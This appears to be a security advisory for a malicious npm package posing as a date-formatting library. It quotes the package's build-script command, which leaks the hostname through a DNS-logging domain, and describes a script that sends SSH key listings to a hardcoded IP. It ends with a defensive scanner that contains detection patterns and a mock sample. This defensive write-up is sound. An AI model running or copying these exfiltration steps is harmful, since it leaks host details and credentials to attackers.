Malicious package

houzidawang806 (npm)

Malicious code in houzidawang806 (npm). Remove it immediately and rotate any exposed credentials.

MAL-2026-5729
Immediate action
Remove the package, then rotate any secrets the build/runtime could reach.
npm uninstall houzidawang806

What this malware does

The package describes itself as 'A simple date formatting utility' but ships two distinct attacker primitives.

(1) postinstall.js enumerates ~/.ssh/ for *.pub files and POSTs the listing, along with os.userInfo().username and the platform, to the hardcoded bare-IP endpoint https://124.221.154.135:443/post. The file's comments, written in Chinese, explicitly label sections as targets and C2 server: '窃取目标' ("theft targets"), 'C2 服务器' ("C2 server"), '模拟外传数据到攻击者服务器 (C2)' ("simulate exfiltrating data to the attacker's server (C2)"). The script is shipped in the tarball but not wired into package.json lifecycle hooks, so it does not auto-execute on npm install; however, any tooling or developer that runs the shipped postinstall.js will exfiltrate SSH key listings to the attacker.

(2) package.json scripts.build runs curl http://$(hostname).ba6511da.log.dnslog.pp.ua, embedding the installer's hostname as a subdomain of a public DNS-logging service used for out-of-band exfiltration. Running npm run build leaks the machine hostname to the attacker via DNS.

The mismatch between documentation and behavior (a date-formatting library has no need for SSH directory enumeration, hostname recon, or hardcoded IP callbacks), together with the explicit C2-labeled comments, makes malicious intent unambiguous.
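A static check for the two patterns described above, as an added example that is not code from the advisory or from the package. The function name, rule names and sample package are assumptions made for illustration, and the sample endpoint and domain are reserved documentation values rather than the real indicators.

```javascript
// Added example: audit one package (parsed package.json + file contents).
const LIFECYCLE = ["preinstall", "install", "postinstall", "prepare"];
const NET_TOOL = /\b(curl|wget|nslookup|dig|ping)\b/;
const SHELL_SUBST = /\$\([^)]*\)|`[^`]*`/; // $(hostname) or `hostname`
const BARE_IP_URL = /https?:\/\/\d{1,3}(\.\d{1,3}){3}(:\d+)?/;
const SSH_DIR = /\.ssh\b/;

function auditPackage(manifest, files) {
  const findings = [];
  const scripts = manifest.scripts || {};
  for (const [name, cmd] of Object.entries(scripts)) {
    // Network tool whose target is built from command substitution:
    // host data ends up in the request or in the DNS lookup itself.
    if (NET_TOOL.test(cmd) && SHELL_SUBST.test(cmd)) {
      findings.push({ rule: "script-network-substitution", where: `scripts.${name}` });
    }
  }
  for (const { path, content } of files) {
    const base = path.split("/").pop().replace(/\.[cm]?js$/, "");
    const wired = Object.values(scripts).some((cmd) => cmd.includes(path));
    // A file named after a lifecycle hook that no script invokes is dormant,
    // not harmless: it runs as soon as someone executes it by hand.
    if (LIFECYCLE.includes(base) && !wired) {
      findings.push({ rule: "unwired-lifecycle-file", where: path });
    }
    if (BARE_IP_URL.test(content)) findings.push({ rule: "bare-ip-endpoint", where: path });
    if (SSH_DIR.test(content)) findings.push({ rule: "ssh-directory-access", where: path });
  }
  return findings;
}

// Constructed sample mirroring the advisory's description. The domain and IP
// are reserved documentation values (RFC 2606 / RFC 5737), not the real IoCs.
const sampleManifest = {
  name: "date-format-demo",
  description: "A simple date formatting utility",
  scripts: { build: "curl http://$(hostname).dnslog.example", test: "node test.js" },
};
const sampleFiles = [
  { path: "index.js", content: "module.exports = (d) => d.toISOString();" },
  { path: "postinstall.js",
    content: "const dir = os.homedir() + '/.ssh'; post('https://192.0.2.10:443/post', list(dir));" },
];

for (const f of auditPackage(sampleManifest, sampleFiles)) console.log(f.rule, f.where);
```

The unwired-lifecycle-file rule covers the case noted above where postinstall.js ships in the tarball without a matching package.json hook, which a scanner that only reads the scripts field would miss.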

Malicious versions

17 flagged
1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, 1.0.9, 1.1.0, 1.1.1, 1.1.2, 1.1.3, 1.1.4, 1.1.5, 1.1.7, 1.1.8

Indicators of compromise (SHA-256)

Frequently asked questions

No. houzidawang806 on npm has been identified as a malicious package (versions 1.0.0, 1.0.1, 1.0.2, 1.0.3, 1.0.4, 1.0.5, 1.0.6, 1.0.7, and 9 more flagged). It should be removed immediately — do not install or keep it in your dependency tree.

Campaign

IN-MAL-2026-006292, IN-MAL-2026-006291, IN-MAL-2026-006287, IN-MAL-2026-006295, IN-MAL-2026-006296, IN-MAL-2026-006289, IN-MAL-2026-006293, IN-MAL-2026-006294, IN-MAL-2026-006290, IN-MAL-2026-006288, IN-MAL-2026-006308, IN-MAL-2026-006303, IN-MAL-2026-006310, IN-MAL-2026-006304, IN-MAL-2026-006302, IN-MAL-2026-006299, IN-MAL-2026-006309, IN-MAL-2026-006298, IN-MAL-2026-006301, IN-MAL-2026-006297, IN-MAL-2026-006307

Credits

  • Amazon Inspector · finder

houzidawang806 (npm) malicious package — MAL-2026-5729 | O3 Security